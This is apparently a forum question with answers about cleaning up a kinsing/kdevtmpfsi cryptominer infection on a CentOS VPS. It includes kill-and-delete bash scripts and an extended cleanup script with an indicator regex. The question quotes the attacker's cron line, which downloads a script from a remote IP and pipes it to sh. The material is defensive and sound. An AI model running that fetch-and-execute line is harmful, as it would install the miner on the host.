I've recently been hacked on my VPS (using CentOS 7.6 and CWP, up to date) and the following files/folders were created:
/tmp/.ICEd-unix
/var/tmp/.ICEd-unix
/tmp/kdevtmpfsi
/var/tmp/kinsing
The following processes were running and using 100% CPU and Memory:
kdevtmpfsi
kinsing
Also, the user's crontab had this following line:
* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
As of yet, I'm still getting the /tmp/.ICEd-unix and /var/tmp/.ICEd-unix folders created every hour and I can't figure out what it is.
- create a cron on the root user that kills the processes and deletes the files:

```bash
#!/bin/bash
# kill the miner processes first, then remove their files
killall -9 kinsing
killall -9 kdevtmpfsi
rm -f /var/tmp/kinsing
rm -f /tmp/kdevtmpfsi
# the .ICEd-unix entries are directories, so rm -f alone leaves them in place
rm -rf /var/tmp/.ICEd-unix
rm -rf /tmp/.ICEd-unix
```
- remove the crontab line from the affected user
- remove all unnecessary opened ports in firewall
- disable shell access to the user (from CWP)
- update all services/projects to the latest possible versions available in your package manager
- Found these lines in suexec.log: https://imgur.com/yIliqjJ, therefore an exploit from phpunit. My libraries for the Laravel project weren't up to date.
If the bash script didn't work as expected because of the `pidof` command, you could try `pgrep`. Basically your bash script should be like below:

```bash
#!/bin/bash
# kinsing: look up its PID(s) and kill them (skip the kill if nothing is running)
PID=$(pgrep kinsing)
echo "$PID"
[ -n "$PID" ] && kill -9 $PID
# kdevtmpfsi: look up its PID(s) and kill them
PID=$(pgrep kdevtmpfsi)
echo "$PID"
[ -n "$PID" ] && kill -9 $PID
# Delete malware files (the ';' must be escaped so find, not the shell, receives it)
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
```
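The two answers above both describe the same cleanup (kill the miner processes, delete the dropped files, remove the cron line). Below is an added example that is not code from either poster: it packages that procedure as reusable shell functions, using only the indicators named in the question (the four paths, the two process names, and the `195.3.146.118`/`p.sh` cron download). The `root` prefix argument is an assumption added so the functions can be exercised against a scratch directory before being pointed at `/`; the hunt over `/etc/cron.d`, `/etc/crontab`, `/etc/cron.hourly` and `/var/spool/cron` goes beyond the single user crontab mentioned on the page, because an entry in any of those locations would recreate the artifacts on a schedule.

```bash
#!/bin/bash
# Added example (not the posters' script): kinsing/kdevtmpfsi cleanup helpers.
# ROOT prefix arguments are hypothetical, for testing against a scratch tree.
set -u

# Indicators taken from the question: dropped files/directories, process
# names, and the cron download. The regex avoids a literal '|' so it is a
# plain ERE for grep -E.
KINSING_PATHS="/tmp/kdevtmpfsi /var/tmp/kinsing /tmp/.ICEd-unix /var/tmp/.ICEd-unix"
KINSING_PROCS="kinsing kdevtmpfsi"
CRON_IOC='195\.3\.146\.118|wget -q -O - http://[^ ]*/p\.sh'

# Kill the miners by exact process name. pgrep -x avoids matching this
# script itself if it were saved under a name containing "kinsing".
kill_miners() {
  local name pids
  for name in $KINSING_PROCS; do
    pids=$(pgrep -x "$name" || true)
    [ -n "$pids" ] && kill -9 $pids
  done
  return 0
}

# Remove the dropped artifacts under ROOT (default: the real filesystem).
# rm -rf is needed because .ICEd-unix is a directory; rm -f leaves it in
# place silently, which looks like the malware "coming back". Prints the
# number of paths removed.
remove_artifacts() {
  local root="${1:-}" p n=0
  for p in $KINSING_PATHS; do
    if [ -e "$root$p" ]; then
      rm -rf -- "$root$p"
      n=$((n + 1))
    fi
  done
  echo "$n"
}

# Filter a crontab (stdin -> stdout), dropping only lines matching the IoC.
# grep returns 1 when every line is removed, so || true keeps the pipe sane.
strip_malicious_cron() {
  grep -Ev "$CRON_IOC" || true
}

# List every system cron file under ROOT that still carries the IoC. A hit
# here, rather than in the affected user's crontab, is what keeps recreating
# the artifacts on a schedule. CentOS stores user crontabs in /var/spool/cron.
find_cron_iocs() {
  local root="${1:-}"
  grep -rEl "$CRON_IOC" \
    "$root/etc/crontab" "$root/etc/cron.d" "$root/etc/cron.hourly" \
    "$root/var/spool/cron" 2>/dev/null || true
}

# Full sequence against the live host. Only crontabs that actually contain
# the IoC are rewritten, so users without a crontab are left untouched.
main() {
  local u tab
  kill_miners
  echo "artifacts removed: $(remove_artifacts "")"
  for u in $(cut -d: -f1 /etc/passwd); do
    if tab=$(crontab -u "$u" -l 2>/dev/null) \
       && printf '%s\n' "$tab" | grep -Eq "$CRON_IOC"; then
      printf '%s\n' "$tab" | strip_malicious_cron | crontab -u "$u" -
      echo "cleaned crontab of $u"
    fi
  done
  echo "remaining cron files with the IoC (review by hand):"
  find_cron_iocs ""
}

# Run as: bash kinsing-cleanup.sh --apply   (as root)
if [ "${1:-}" = "--apply" ]; then
  main
fi
```

Run it as root with `--apply`; without the flag it only defines the functions. If `find_cron_iocs` still reports a file after the user's crontab is cleaned, that file is the persistence that explains the hourly reappearance, and the web application that let the cron be planted (the phpunit path in suexec.log, per the first answer) must be patched or the cleanup will not hold.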